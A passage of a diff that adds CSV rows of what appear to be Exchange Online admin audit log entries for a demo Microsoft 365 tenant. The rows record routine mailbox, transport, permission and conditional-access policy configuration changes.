+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:08:51Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:08:40Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}""
+  },
+  {
+    ""Name"": ""ShardRelevancyFeatureStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Microsoft Exchange""
+  }
+]"
+2020-04-23T06:08:29Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}""
+  },
+  {
+    ""Name"": ""UMDataStorage"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  }
+]"
+2020-04-23T06:08:12Z,,,Install-ResourceConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-04-23T06:07:56Z,,,Install-DefaultSharingPolicy,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-04-23T06:07:30Z,,,Set-TransportConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""SupervisionTags"",
+    ""Value"": ""Reject;Allow""
+  }
+]"
+2020-04-23T06:07:23Z,,,Enable-AddressListPaging,"[
+  {
+    ""Name"": ""DoNotUpdateRecipients"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-04-23T06:07:26Z,,,New-ExchangeAssistanceConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""IgnoreDehydratedFlag"",
+    ""Value"": ""True""
+  }
+]"
+2020-04-23T06:10:15Z,,,Set-ExchangeAssistanceConfig,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""PrivacyStatementURL"",
+    ""Value"": ""http://go.microsoft.com/fwlink/?LinkID=259417""
+  },
+  {
+    ""Name"": ""PrivacyLinkDisplayEnabled"",
+    ""Value"": ""True""
+  }
+]"
+2020-04-23T06:10:13Z,,,Set-RecipientEnforcementProvisioningPolicy,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""IgnoreDehydratedFlag"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\Recipient Quota Policy""
+  },
+  {
+    ""Name"": ""PublicFolderHierarchyMailboxCountQuota"",
+    ""Value"": ""100""
+  }
+]"
+2020-04-23T06:09:30Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:09:29Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:10:14Z,,,Set-TransportConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""HygieneSuite"",
+    ""Value"": ""Premium""
+  }
+]"
+2020-04-23T06:09:29Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:10:19Z,,,Set-AdminAuditLogConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""IgnoreDehydratedFlag"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""AdminAuditLogEnabled"",
+    ""Value"": ""True""
+  }
+]"
+2020-04-23T06:10:11Z,,,Add-MailboxPermission,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}""
+  },
+  {
+    ""Name"": ""User"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/Discovery Management""
+  },
+  {
+    ""Name"": ""AccessRights"",
+    ""Value"": ""FullAccess""
+  }
+]"
+2020-04-23T06:09:49Z,,,Set-OwaMailboxPolicy,"[
+  {
+    ""Name"": ""InstantMessagingType"",
+    ""Value"": ""Ocs""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\OwaMailboxPolicy-Default""
+  }
+]"
+2020-04-23T06:09:28Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:10:18Z,,,Set-TenantObjectVersion,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-04-23T06:10:10Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}""
+  }
+]"
+2020-04-23T06:09:37Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""TenantAllowBlockLists"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:09:27Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-22T03:12:42Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/22/2020 3:12:42 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-22T03:12:41Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/22/2020 3:12:41 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-22T03:12:39Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/22/2020 3:12:39 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-22T03:12:42Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/22/2020 3:12:41 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-22T03:12:41Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/22/2020 3:12:41 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-22T03:12:40Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/22/2020 3:12:39 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-22T03:12:42Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/22/2020 3:12:42 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-04-22T03:12:41Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/22/2020 3:12:41 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-22T03:12:41Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
